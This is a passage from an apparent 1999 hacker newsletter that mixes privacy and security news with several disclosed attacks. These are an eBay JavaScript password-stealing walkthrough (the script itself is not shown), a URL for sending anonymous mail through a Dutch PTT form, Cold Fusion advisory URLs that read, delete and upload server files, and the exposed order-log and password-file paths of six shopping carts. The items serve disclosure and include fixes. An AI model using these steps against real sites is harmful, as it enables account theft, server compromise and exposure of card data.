       Not long after, the FAA gave a $3.1-million grant to Northwest Airlines to create CAPS and $7.8 
       million to assist other airlines in deploying it, according to agency figures. Northwest did not
       immediately return phone calls. 
       
       While most of the large carriers have CAPS systems in place, smaller airlines could be in trouble. 
       The proposed rule states that the "FAA believes that if the potential cost of compliance materializes
       as expected, several small operators could go out of business due at least in part to the proposed rule." 
       
       For each of the 12 smaller airlines, the FAA's estimated cost of compliance -- largely hiring staff
       to do searches -- would be 0.2 to 7.2 percent of total revenues. The FAA estimates the total cost at
        $2.3 billion over 10 years. 
       
       Critics have said the costs of such a plan outweigh the benefits and terrorists are unlikely to be
       deterred in any case. "Profiling is a surrender. It's an effort to make people feel safer about flying
       even though what's being done is highly invasive of passenger privacy, likely to result in
       discriminatory searches, and unlikely to effectively stop bombings of airplanes," says the ACLU's Nojeim. 
       
       Comments on the proposed rule, which can be emailed to 9-NPRM-CMTS@faa.gov, must be received by 18 June. 
       
       @HWA
       
 15.0  The Ebayla Hack
       ~~~~~~~~~~~~~~~
       
       from: http://www.because-we-can.com/ebayla/default.htm
       
       contributed to HWA by BHZ
       
       THE EBAYLA BUG AND HOW TO PROTECT YOURSELF

       This page describes a security problem that Blue Adept discovered with eBay's
       on-line auctions on March 31, 1999 (realaudio interview). The security hole allows
       eBay users to easily steal the passwords of other eBay users. The exploit involves
       posting items for bid that include malicious javascript code as part of the item's
       description. When an unsuspecting eBay user places a bid on the item, the
       embedded javascript code sends their username and password to the malicious
       user by e-mail. From the victim's point of view, nothing unusual seems to have occured,
       so they are unlikely to report/complain to
       eBay.

       Once a malicious user knows the username/password of the victim's eBay account, she can
       assume full control of the account, including the ability to: 

        o   create new auctions (automtically charging the victim's account) 
        o   place bids in the victim's name, 
        o   retract legitimate bids in the victim's name, 
        o   change the victim's username/password, barring them from eBay, 
        o   associate bogus negative/positive comments with an arbitrary seller, 
        o   prematurely close an auction being run by the victim. 
        o   insert the ebayla code into the victim's auction.
            (The code could be altered to do this automatically, which would constitute an ebayla virus). 

       The security problem is dangerously easy to take advantage of. A malicious user needs only
       to embed the javascript code into their description of an item for auction. A walk-through of
       the exploit demonstrates step-by-step how any user can steal eBay passwords.

       Blue Adept notified eBay that a 'huge' potential security problem existed on March 31,1999
       and offered assistance (but as of April 18, 1999 has only received form letter
       KMM798062C0KM in reply). Information about the ebayla exploit is being made publicly
       available to speed the process of fixing the security hole. 

       TRY THE EBAYLA BUG DEMO ON YOURSELF!

       Visit a working demonstration of this exploit at eBay! The demo works with any javascript-enabled
       browser, such an Netscape or Internet Explorer. Users must register (free) with eBay to place bids.

         ** The demo is Blue Adept's own auction infected with eBayla code. WARNING! When you bid on this
            item (or even just review your bid without placing it), your username and password will 
            automatically be mailed back to because-we-can.com.



       HOW TO PROTECT YOURSELF

       Unfortunately, the potential security issues at eBay are difficult to spot and avoid. If you are 
       unfamiliar with spotting suspect javascript in the docsource of an html document, the best way to
       protect yourself may be to avoid using eBay until adequate html filters have been implemented.

      

       
       THE EBAYLA BUG WALK-THROUGH

       This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal usernames and
       passwords from eBay users. The resources required to launch the attack are minimal and freely available. The following exploit
       is written to work with Netscape Communicator only. The goal is to demonstrate that using only the items listed below, a
       malicious user can aquire eBay usernames and passwords. (To see a more efficient (2 line) version of the code that uses a Perl
       script, visit the the live demo at eBay.)

       INGREDIENTS: 

            1 Computer with Internet Access 
            1 email account 

       STEP 1:
       Visit ebay.com and register for a free user account. 

       STEP 2:
       Go to the sellers's area to post an item for auction. When asked to enter the description of the item, post the following
       description, containing the ebayla code. The first line of the script indicates the email address to which usernames/passwords
       are to be sent. 

            1 car, comes with windows.  crashes frequently.  toy.
WARNING do not bid on this item!! This auction is a demonstration of the ebayla bug. If you place/review a bid, your username and password will be mailed to http://www.because-we-can.com. STEP 4: Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message that contains the user's username and password. Note: In the exploit described above, the part of the program that does the actual "dirty-work" of mailing the password and username is a randomly chosen server-side mailing script we found on the web. There are many equivalent and publicly available server-side mailing programs that can be used in it's place. @HWA 16.0 Cool security in Dutch PTT site allows users to send anonymous spam ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by [p] on IRC http://www.ptt-telecom.nl/9267100/h/reageer.htm If you use the following line you can send a message to anyone anonymously http://www.ptt-telecom.nl/cgi-bin/r267100_ip?ip_email=user@pine.nl&onderwerp=hey%20paardelul&B11_bericht=gksdagyudsykgdjksg onderwerp = subject B11_bericht = message @HWA 17.0 Cold Fusion vulnerability, thousands of sites exposed to danger. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Via HNN and The l0pht Advisories. Release Application Platforms Severity 04/20/99 Cold Fusion 3 and 4 All Remote users can upload, download and modify any file on the web server Author: kklinsky@themerge.com There is a security problem with installations of Cold Fusion Application Server when the online documentation is installed. The online documentation is installed by default. The vulnerability allows web users to view, delete, upload and potentialy execute files anywhere on the server. On February 4, 1999, Allaire posted a fix on their web site (www.allaire.com) and also recommend that documentation not be stored on production servers. They also acknowledge that the hole allows web users to read and also delete files on the server but not upload or execute them. The patch successfully fixes the problem if you decide to keep the documentation on the server. Advisory from the l0pht follows; L0pht Security Advisory ------------- URL Origin: http://www.l0pht.com/advisories.html Release Date: April 20th, 1999 Application: Cold Fusion Application Server Severity: Web users can download, delete and even upload executable files to a Cold Fusion server. Access is not limited to files under the web root. Author: kklinsky@themerge.com Operating Sys: All platforms ------------- I. Description In issue 54, volume 8 of Phrack Magazine dated December 25, 1998, rain.forest.puppy describes a security problem with installations of Cold Fusion Application Server when the online documentation is installed. The online documentation is installed by default. According to Phrack, the vulnerability allows web users to view files anywhere on the server. On February 4, 1999, Allaire posted a fix on their web site (www.allaire.com) and also recommend that documentation not be stored on production servers. They also acknowledge that the hole allows web users to read and also delete files on the server. The patch successfully fixes the problem if you decide to keep the documentation on the server. In examining an unpatched Cold Fusion Application Server it became apparent that in addition to reading and deleting files, web users also have the ability to upload (potentially executable) files to the server. A cursory survey of many large corporate and e-commerce sites using Cold Fusion turned up many vulnerable servers. The purpose of this advisory is to stress how important it is to use the patch that Allaire provides or take other measures to prevent web users from accessing this security hole. II. Details By default, the Cold Fusion application server install program installs sample code as well as online documentation. As part of this collection is a utility called the "Expression Evaluator". The purpose of this utility is to allow developers to easily experiment with Cold Fusion expressions. It is even allows you to create a text file on your local machine and then upload it to the application server in order to evaluate it. This utility is supposed to be limited to the localhost. There are basically 3 important files in this exploit that any web user can access by default: "/cfdocs/expeval/openfile.cfm", "/cfdocs/expeval/displayopenedfile.cfm" and "/cfdocs/expeval/exprcalc.cfm". The first one lets you upload a file via a web form. The second one saves the file to the server. The last file reads the uploaded file, displays the contents of the file in a web form and then deletes the uploaded file. The Phrack article and the advisory from Allaire relate to "exprcalc.cfm". A web user can choose to view and delete any file they want. To view and delete a file like "c:\winnt\repair\setup.log" you would use a URL like: http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log This exploit can be taken a step further. First go to: http://www.server.com/cfdocs/expeval/openfile.cfm Select a file to upload from your local machine and submit it. You will then be forwarded to a web page displaying the contents of the file you uploaded. The URL will look something like: http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt Now replace the end of the URL where it shows ".\myfile.txt" with "ExprCalc.cfm". Going to this URL will delete "ExprCalc.cfm" so that web users can now use "openfile.cfm" to upload files to the web server without them being deleted. With some knowledge of Cold Fusion a web user can upload a Cold Fusion page that allows them to browse directories on the server as well as upload, download and delete files. Arbitrary executable files could placed anywhere the Cold Fusion service has access. Web users are not restricted to the web root. Frequently, Cold Fusion developers use Microsoft Access databases to store information for their web applications. If the described vulnerability exists on your server, these database files could potentially be downloaded and even overwritten with modified copies. The most concerning aspect of this vulnerability is that with a text editor and a web browser, web users are able to download password files, other confidential information and even upload executable files to a web server. III. Solution Allaire has posted a patch to this vulnerability. This is currently available at: http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full In addition to this, it is recommended that the documentation and example code not be stored on production servers. For specific questions about this advisory, please contact kklinsky@themerge.com --------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://www.l0pht.com/advisories.html --------------- sample app to upload and download files: (this link appeared to be broken when I tried it, maybe you'll have better luck) http://www.l0pht.com/advisories/mole.cfm patch from Allaire: http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full Allaire Security Bulletin (ASB99-01) Expression Evaluator Security Issues Originally Posted: February 4, 1999 Summary One of the sample applications installed with ColdFusion Server, the Expression Evaluator, exposes the ability to read and delete files on the server. Allaire has released a patch that will limit access to the Expression Evaluator to page requests made from the machine where it is installed. As an additional measure of protection, Allaire recommends that customers not install (or remove existing) documentation, sample code, example applications and tutorials on production servers and secure access to these files on workstations. Issue A range of sample code and example applications are provided with ColdFusion Server to assist customers in learning and using the product. Among these is an application called the Expression Evaluator, which is installed in the //CFDOCS/expeval/ directory. The Expression Evaluator lets users process expressions such as 1 + 1 to see how ColdFusion expression evaluation works. Used normally, the application is restricted to access from the local machine based on the 127.0.0.1 IP address. However, some pages in the Expression Evaluator can be accessed directly, exposing the ability to read and delete files anywhere on the server where the evaluator is installed. Affected Software Versions Cold Fusion Application Server 2.0 (all editions) Cold Fusion Application Server 3.0 (all editions) Cold Fusion Application Server 3.1 (all editions) ColdFusion Server 4.0 (all editions) What Allaire is Doing Allaire has released a patch that modifies the Expression Evaluator so that all the pages in the Evaluator are restricted to access from the local machine where the Expression Evaluator is installed based on the 127.0.0.1 IP address. Download - ColdFusion Expression Evaluator Security Patch (Windows NT) Download - ColdFusion Expression Evaluator Security Patch (Solaris) What Customers Should Do Customers should run the patch on all of their systems where the Expression Evaluator is installed. Furthermore, we recommend that customers remove (or not install in the first place) all documentation, sample code, example applications, and tutorials from production servers (e.g. servers accessible by end users via the Internet, intranets or extranets). The CFDOCS directory should be secured on developer workstations. The examples that are installed with ColdFusion are installed in the CFDOCS directory, which is normally installed in the root Web server directory. These examples can be removed by deleting the CFDOCS directory. Instead of deleting these files, the entire CFDOCS directory can be secured with standard Web server security. Revisions February 4, 1999 -- Bulletin first released. Reporting Security Issues Allaire is committed to addressing security issues and providing customers with the information on how they can protect themselves. If you identify what you believe may be a security issue with an Allaire product, please send an email to secure@allaire.com. We will work to appropriately address and communicate the issue. Receiving Security Bulletins When Allaire becomes aware of a security issue that we believe significantly affects our products or customers, we will notify customers when appropriate. Typically this notification will be in the form of a security bulletin explaining the issue and the response. Allaire customers who would like to receive notification of new security bulletins when they are released can sign up for our security notification service. For additional information on security issues at Allaire, please visit the Security Zone at: http://www.allaire.com/security THE INFORMATION PROVIDED BY ALLAIRE IN THIS BULLETIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. ALLAIRE DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL ALLAIRE CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF ALLAIRE CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. @HWA 18.0 Privacy at risk in e-commerce rush ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Privacy at risk in e-commerce rush By Troy Wolverton Staff Writer, CNET News.com April 21, 1999, 11:25 a.m. PT URL: http://www.news.com/News/Item/0,4,35451,00.html As small businesses rush to sell on the Internet, many shop owners lacking technical expertise--and the Web developers and hosting services that create their sites--have unwittingly exposed customer information, including names, addresses, and full credit-card numbers. At least 100 small sites have exposed this information, CNET News.com has learned. One of them is Florida-based Knox Nursery, which launched Home Gardener Direct in February and was unaware it was revealing customer order data on insecure Web pages when contacted by CNET News.com last week. "You've caught us with our pants down," said Rick Grossman, sales manager at GrowerNet, which designed Home Gardener Direct. "We've never had a security problem before." Home Gardener Direct's security breach was discovered by Joe Harris, a systems administrator at Blarg Online Services, a Bellevue, Washington-based Internet service provider. Harris was investigating a problem on a client's site last week and searched the Internet for other similarly configured sites, using search terms such as "index" "parent" "order" and "log." What he found were more than 100 sites, using various types of shopping cart technology, exposing the same types of information. The breaches are just the latest in a series of recent privacy and security problems on the Web. But unlike earlier problems, which affected large companies such as Yahoo, Nissan, Excite and AT&T, the latest ones are both more widespread and affect much smaller companies. The problem, analysts say, is that few small businesses understand the complexities of setting up a Web storefront. Although merchants say they are concerned about customers' security, they often don't have the technical expertise to guarantee it. Lacking that expertise, small businesses are turning to Web designers and service providers who may be just as ill-prepared to set up secure e-commerce sites. Security "is probably a small concern in the back of their minds," said David Kerley, Web technology analyst at Jupiter Communications. According to International Data Corporation, the number of small business Web pages doubled last year from 600,000 at the end of 1997 to 1.2 million at the end of 1998. That represents some 17 percent of all small businesses. Without technical knowledge, Kerley said, small businesses find it difficult to oversee the security of their sites, and many companies don't even know which questions to ask. "I think it's a huge challenge for the small- to medium-size company who can't afford the expertise in-house," Kerley said. But entrepreneurs, lured by the promise of reaching new customers online, feel they can't afford not to have a Web presence. Mark Stone, the owner of Stoie's StoGies, has been selling cigars on the Internet for two years as a way to get repeat business from tourists who visit his brick-and-mortar shop in San Francisco's Fisherman's Wharf. "The Web store is a nice complement to customers who don't live in the Bay Area," Stone said. Stone, whose site was also recently discovered to be revealing order information, found his hosting service, US1Internet, in the Yellow Pages. He said the ISP had done a "good job" of hosting his store, keeping him updated on the site and making needed changes. Security concerns are "not something that has come up," Stone said. Small Web merchants aren't only ones who lack the expertise to ensure security. Many site designers have little experience designing retail sites and may not know how to protect private information. Home Gardener Direct, for instance, was the first e-commerce site that GrowerNet designed, according to Grossman. Ray Boggs, an analyst with IDC, compared small business' hurry to begin selling on the Web to California's Gold Rush. During the Gold Rush, Boggs said, those who got rich provided tools to the miners, and many Internet companies see a similar opportunity in providing e-commerce tools to small businesses. "It's the ideal entrepreneurial environment," Boggs said. "It really does point to the hyper-evolving nature of the market and the Wild West nature of the market." Although none of the small-business sites directly linked to the information and no stolen credit card numbers have been reported, the breach is still a significant one, according to Deirdre Mulligan, staff counsel at the Center for Democracy and Technology. "All it takes is one person to wreak havoc," Mulligan said. Extropia, a Web developer that created the WebStore shopping cart software used by many of the affected sites, blamed site administrators and store owners for configuring the software incorrectly and exposing customer information. "They're really excited and they don't want to take the time to make the store right," said Extropia president Eric Tachibana. "To a certain degree, I empathize with them. These people don't want to computer program, they want to sell stuff." @HWA 18.1 CC numbers left vulnerable by many shopping cart programs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ April 21st Numerous Sites Expose CC Data contributed by Silicosis Numerous commercial and freeware shopping carts when installed incorrectly result in the possible exposure of customer information. Information exposed may include Name, CC Numbers, home address, phone number, what they ordered, how much they paid etc. The e-commerce software creates world readable files in the web server's document tree which then get indexed by numerous search engines. BUGTRAQ; Shopping Carts exposing CC data Joe (joe@GONZO.BLARG.NET) Mon, 19 Apr 1999 20:05:18 -0700 Tomorrow ( April 20 1999 ) CNet's news.com should be running a story regarding various commercial and freeware shopping carts that, when installed incorrectly or when installed by amateurs, result in the possible exposure of customer information... and not just a few digits of a credit card number like Yahoo's latest goof - everything is exposed. Name, CC Numbers, home address, phone number, what they ordered, how much they paid etc etc etc. These various shopping carts create world readable files in the web server's document tree which have subsequently been indexed by numerous search engines. (If a cold chill didn't just run down your spine, please, check your pulse) To access this order information you need a search engine and a little knowledge of how these various shopping carts are structured. Since some are freeware and the commercial carts have downloadable demos, this is trivial information to obtain. This email is a heads up to system administrators and hosts. These exposed order files were found by common search engine techniques and I suspect that after this story hits, those files are going to be even more vulnerable than they already are. If your users have 3rd party shopping carts installed on your servers, please run an audit on the files they generate and maintain. Any clear-text order information available to or stored in your web servers document tree should be immediately removed or have their access restricted. This is common sense to most of us here however, like most hosts, we don't always know what security nightmares our users have created for us and for themselves. I am hesitant to list the shopping carts that I've found to be exposing information, for fear of giving too much information to the wanna-be thieves out there. Please contact me directly if you want specifics. The list is very short, however, about 100 exposed installations of these carts have already been found and there are undoubtably hundreds more that I haven't found. Some of these sites are doing a great deal of business and some are doing none at all - but all of them are exposing order information. On one site alone was enough data to allow a thief to live like a king. (Until the FBI caught up with them that is :) A side note: Before anyone screams about us not contacting these CGI authors - Because of the sheer number of installations and the number of vendors involved, taking this to each one of them would have been prohibitive. We did have a conversation with one (fairly large) commercial vendor (who shall remain nameless) and if the response we got from them was any indication, contacting the remaining vendors would have been futile. This particular vendor couldn't see the problem we had with the software that -they themselves- had installed on behalf of our mutual client. They couldn't understand why we told them to change their software or remove it from the server, even after a long and patient explanation of a little thing called 'liability'. Their tech told me last Wednesday that their engineer would contact us to address these issues - which as of this writing hasn't happened. (Not that I expected one - we had to explain "world readable" to their rep 3 times and I'm still not sure he really understood why this was such a Bad Idea (tm).) We also tried to get the various CC companies involved in this and to be blunt, they practically begged us to go away. This is fairly odd since they are the ones that take the financial hit if these data files are exposed. Visa Fraud's only recommendation to us was to "send a letter to the FTC and let them deal with it". Sorry, but red tape like that is best cut with the press, and they can get a much faster and more effective response from the various vendors than a modest sized ISP in Seattle can. My apologies for the late notice... and now for the standard disclaimer: Opinions expressed here are my own and not neccessarily that of my employer. Cheers. Joe. -- Joe H. Technical Support General Support: support@blarg.net Blarg! Online Services, Inc. Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net Re: Shopping Carts exposing CC data Joe (joe@GONZO.BLARG.NET) Tue, 20 Apr 1999 13:34:57 -0700 My apologies for the canned response, but I'm getting an email request for specifics on this mess averaging 1 per minute - so I'll post this to the list. To answer many questions all at once: CNet has not posted the story yet. (This is a good thing) More time to minimize the damage... The larger ECommerce sites usually write their stuff in house. As such, places like Onsale.com, Amazon.com etc are not, to my knowledge, vulnerable in the least. The ones you need to concern yourself with are those that purchase 3rd party shopping systems and then install them incorrectly. From what I've been able to gather, it's the smaller mom-n-pop operations that are causing the most damage. If a cart is not listed here, it should not be considered vulnerable in the slightest. I myself have no problem doing business with Amazon, Onsale, SurplusAuction, UBid, Buy.com et al. This doesn't mean you shouldn't check your own installs though. It would perhaps be prudent for ECommerce sites to reveal their architecure and security scheme within their privacy statements. I for one would like to hear them all say "No un-encrypted data stored on servers - period." (This is our own policy) Hell, something as simple as a 1024b PGP scheme with off-net private keys would make me deliriously happy. Please don't ask me if your particular cart is "vulnerable". Check for yourself, since ALL of the carts listed below CAN be secured and are usually only exposing data when the end user fsks up the install. Simply check all files that contain customer data (order.log etc..) and see if it's available to a web browser. You should already have the path to it, so plug in the url to that file, if it comes up, you got problems. It should be noted that these are not "bugs" in the common vernacular, just improperly installed/maintained carts. Under NO circumstances should any of the carts listed below be blacklisted or considered unsafe. Quite the contrary. Many of the carts listed below provide PGP options that would completely eliminate this problem. Sadly, too few cart users are utilizing these options and instead are taking the path of least resistance. Here are the six shopping carts that, when installed contrary to their documentation or are improperly maintained can expose order information. All of the exposed information generated by these carts was discovered through a public search engine. Selena Sol's WebStore 1.0 http://www.extropia.com/ Platforms: Win32 / *Nix (Perl5) Executable: web_store.cgi Exposed Directory: Admin_files Exposed Order info: Admin_files/order.log Status: Commercial ($300)/ Demo available. Number of exposed installs found: 100+ PGP Option available?: Yes Order Form v1.2 http://www.io.com/~rga/scripts/cgiorder.html Platforms: Win32 / *Nix (Perl5) Executable: ? Exposed Directory: Varies, commonly "Orders" "order" "orders" etc.. Exposed Order Info: order_log_v12.dat (also order_log.dat) Status: Shareware ($15/$25 registration fee) Number of exposed installs found: 15+ PGP Option available?: Unknown. Seaside Enterprises EZMall 2000 http://www.ezmall2000.com/ Platforms: Win32 / *Nix (Perl5) Executable: mall2000.cgi Exposed Directory: mall_log_files Exposed Order Info: order.log Status: Commercial ($225.00+ options) Number of exposed installs found: 20+ PGP Option Available?: YES QuikStore http://www.quikstore.com/ Platforms: Win32 / *Nix (Perl5) Executable: quikstore.cgi Exposed Order info: quikstore.cfg* (see note) Status: Commercial ($175.00+ depending on options) Number of exposed installs found: 3 PGP Option Available?: Unknown. NOTE: This is, IMHO, one of the most dangerous of the lot, but thankfully, one of the lowest number of discovered exposures. Although the order information itself is secured behind an htaccess name/pwd pair, the config file is not. The config file is world readable, and contains the CLEAR TEXT of the ADMINS user id and password - rendering the entire shopping cart vulnerable to an intruder. QuikStore's "password protected Online Order Retrieval System" can be wide open to the world. (Armed with the name and pwd, the web visitor IS the administrator of the shopping cart, and can view orders, change settings and order information - the works.) PDGSoft's PDG Shopping Cart 1.5 http://www.pdgsoft.com/ Platforms: Win32 / *Nix (C/C++(?)) Executable: shopper.cgi Exposed Directory: PDG_Cart/ (may differ between installs) Exposed Order info: PDG_Cart/order.log Exposed Config info: PDG_Cart/shopper.conf (see note) Status: Commercial ($750+ options) Number of exposed installs found: 1+ (They installed it on our server) PGP Option Available?: Unknown. (Couldn't get a yes or no outta them) NOTE: if they renamed the order log, shopper.conf will tell you where it's at and what it was named - worse, shopper.conf exposes the clear text copy of Authnet_Login and Authnet_Password, which gives you full remote administrative access to the cart. shopper.conf, from what I can determine based on the company installed version we have here, is world readable and totally unsecured. And now a drum roll please: Mercantec's SoftCart http://www.mercantec.com/ Platform: Win32 (*Nix?) Executable: SoftCart.exe (version unknown) Exposed Directory: /orders and /pw Exposed Order Info: Files ending in "/orders/*.olf" Exposed Config Info: /pw/storemgr.pw (user ID and encrypted PW for store mgr?) Number of exposed installs: 1 PGP Option Available?: Unknown NOTES: This one has only been found vulnerable on ONE server. (user error?) The encryption scheme on the storemgr.pw password is unrecognized by me but I'm not an encryption guru. Someone's bound to recognize it. This is a scary one though - HiWay technologies is one of the largest domain hosts in the world, with over 120,000 domains. They are using SoftCart for clients that request ECommerce capabilities. The exposed install I found is hosted by HiWay. *shudder* Any and all opinions expressed here are solely those of the author and do not reflect the views, policies, practices or opinions of my employer. Joe. -- Joe H. Technical Support General Support: support@blarg.net Blarg! Online Services, Inc. Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net @HWA 18.2 E-tailers scramble to fix security holes. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.news.com/News/Item/Textonly/0,25,35559,00.html E-tailers scramble to fix security holes By Troy Wolverton Staff Writer, CNET News.com April 22, 1999, 5:45 p.m. PT URL: http://www.news.com/News/Item/0,4,35559,00.html As reports come to light of security breaches exposing customer order data on dozens of e-commerce sites, software programmers and computer technicians are scrambling to tell customers how to solve the problems. But despite their efforts, some sites are still exposing customer names, addresses, and credit card numbers. This afternoon, CNET News.com found seven sites whose order logs were still exposed. Joe Harris, a computer technician in Bellevue, Washington, discovered the breaches last week on some 130 e-commerce Web sites. The problems stem from sites that place unencrypted order logs in publicly accessible directories. Sites can close the breach by encrypting the logs, placing the logs in password-protected directories, or both. Software vendors say Web designers and Web host are to blame for the breaches, even though many took steps Thursday to help their customers close their security holes. More than 100 of the sites found to have the security breach were using Extropia's WebStore software. Extropia president Eric Tachibana posted a note today on the company's homepage warning WebStore users about the problem. Tachibana, who is also know by his programming name Selena Sol, said he planned to follow that up by sending email to Extropia's mailing list describing the breach and detailing several fixes to the problem. He said he also planned to track down Web sites with the breach and send them the same information. "I figure that NONE of the bad store admins will contact me about it, because if they were the kind of people who would contact me, they would be the kind of people who would have done it right," Tachibana wrote in an email. Tachibana said there are "several thousand" copies of WebStore installed on the Web. Harris found more than 15 Web sites using Merchant OrderForm with security breaches. Russell Alexander, who wrote the program, said he planned to send a notice about the problem and a fix to his 300-400 registered users this weekend. Although Merchant OrderForm does not have encryption built into it, Alexander said the program includes instructions on how to secure the order logs. He said that normally the logs are turned off, meaning that no customer data is collected in the order file. "The best thing to do is to just not turn on the log files," Alexander said. While Tachibana and Alexander were simply notifying users of the problem and providing fixes, Rick Hoelle spent 20 hours writing an update to his company's QuikStore program. Although Harris said he only found three breaches in the QuikStore software, he called it "one of the most dangerous of the lot." According to Harris, the QuikStore installations exposed a configuration file from which Web users could find the system administrator's user name and password. That information could then be used to hack the site, not only allowing users to view sensitive files, but to change and delete them as well. Hoelle said he had already sent QuikStore's registered users an update that would encrypt the user names and passwords. He said a subsequent update would also encrypt log files. Saying that he had already posted information about the breach on a company bulletin board, Hoelle added that planned to update the program's documentation as well. "We know that we have a responsibility to fix this for our customers and their customers," Hoelle said. Harris, who discovered the problem last week, sent out an initial message concerning the breaches on the Bugtraq listserv on Monday. Harris, a computer technician at Blarg Online Services in Bellevue, Washington, followed that up with a more detailed message to the list on Tuesday, documenting the programs affected, the number of sites using those programs that had breaches, and the files exposed. Harris said he wanted to alert as many Web hosts and software vendors as possible about the problem so that he wouldn't happen again. Harris said he was not surprised how the vendors have reacted. "The last thing that people want to do is kill the golden goose that is e-commerce," Harris said. Copyright © 1995-99 CNET, Inc. All rights reserved. Privacy policy. @HWA 19.0 Got lots of time and computing power on your hands? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Via HNN April 21st http://www.hackernews.com/ $50K for the Next Prime Number contributed by Silicosis The Electronic Frontier Foundation is offering $50k to the first person to find a prime number with one million digits. The Electronic Frontier Foundation http://www.eff.org/coop-awards/prime-release1.html The Great Internet Mersenne Prime Search http://www.mersenne.org/prime.htm @HWA 20.0 EU and US disagree on privacy laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Wired, seen on HNN http://www.wired.com/news/news/politics/story/19232.html US, EU Still Stuck on Privacy by James Glave 3:00 a.m. 21.Apr.99.PDT A US plan to protect consumer data falls far short of EU consumer privacy standards, according to a European Union privacy expert. The so-called "Safe Harbor" plan is too vague and lacks sanctions, said Fordham Law School professor Joel Reidenberg. The sticking points were revealed in the latest draft of the Safe Harbor proposal, which was designed to allow stateside companies to do business across the Atlantic. The European Union's Directive on Data Protection was enacted last fall to protect European citizens from privacy invasions. The rules recommend penalties for European nations that send data -- such as frequent flyer information or other marketing information -- to countries that do not meet the criteria. That concerns US Internet companies -- and other data-rich market sectors, such as the airline industry -- which prefer a private-sector-driven, self-regulation approach to consumer privacy. In an effort to address the rules, undersecretary for international trade David Aaron began negotiations with John Mogg of the European Union. Aaron proposed the Safe Harbor standard to allow US companies to meet a certain level of compliance with the directive. "What undersecretary Aaron purports that Safe Harbor will do is, I think, contrary to the European political process and certain aspects of European data protection law," said Reidenberg. But the latest draft of that proposal, released Monday, shows that Europe remains unimpressed with two key aspects of the plan. Specifically, the EU isn't satisfied with Aaron's proposal to allow consumers access to data kept about them, as well as the plan's enforcement provisions. "The Commerce Department has proposed a very vague standard for an individual's right of access to the personal information stored about that individual," said Reidenberg. Reidenberg co-authored a study for the European Commission on Data Protection. The research surveyed US approaches to data privacy and electronic commerce between 1993 and 1996. Under Safe Harbor, the US proposes that consumers be granted "reasonable" access to data kept about them. That term would likely allow firms some hedging room, but the document states that the Europeans want unfettered access. "The European data protection authorities find the qualifications on data-subject access unacceptable," said Jason Catlett, who consults for American Internet companies on data practices. "The Europeans are not going to budge on the subject of access," said Catlett. "I don't see the United States very quickly establishing laws that protect privacy to a level that the Europeans consider adequate." An European Commission spokesperson could not be reached for comment. Reidenberg said that the latest draft of Safe Harbor also reveals the US reluctance to enforce cash remedies for victims of data privacy violations. Such violations are growing commonplace. Last month, for example, General Motors exposed the personal information of more than 10,000 people who entered a contest on the company's Web site. A similar more-recent gaffe at Nissan's Web site reportedly exposed thousands of email addresses. "[The US proposal] continues to be lacking in remedies for victims," said Reidenberg. "It waffles on damage awards." By contrast, he said the directive requires that member states enact sanctions for companies that violate the rules. While the EU does not have jurisdiction over criminal law, the directive recommends that criminal penalties be available. In the US, only the Federal Trade Commission has the authority to penalize data privacy violations. It's a situation that the Online Privacy Alliance, a self-regulation lobbying group, hopes will remain intact. Catlett is not optimistic about the outcome of the negotiations. He compares the US attitude toward Europe's privacy philosophy to Europeans questioning the US Constitution. "There are going to be some tears shed across the Atlantic," Catlett said. @HWA 21.0 Compuserve in court over slander charges ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the UK: http://www.independent.co.uk/sindy/stories/D1804903.html Dixons Sues AOL over internet arm (AOL owns Compuserve) Worlds largest service provider faces paying damages over slanderous claims by CompuServe By Peter Koenig and Tom Bland Freeserve, the internet subscription service set up by Dixons in September, is suing its competitor AOL for slander and malicious falsehood. Freeserve is also seeking a restraining injunction against its rival, the largest internet service provider in the world. In a writ lodged in the High Court, Freeserve alleges that customer service reps for CompuServe, which is owned by AOL, were telling people that Freeserve's provision for free access to the net was temporary and that its service would become fee-paying. "At the end of 1998, Freeserve became aware that some CompuServe customers who were calling CompuServe to cancel their subscriptions in order to transfer to Freeserve, were being told by CompuServe's customer service personnel that they should not do so because Freeserve would be charging for its service in the future," Dixons said in a written statement on Friday. "This was blatantly untrue." AOL, which in Britain operates as a joint venture between the US company America Online and the German media conglomerate Bertelsmann, says that it has responded to Freeserve's concerns. It believes the dispute will soon be settled out of court. AOL concedes that one outstanding issue is the amount of damages it will pay. "In January 1999, Dixons made a complaint to CompuServe claiming that CompuServe 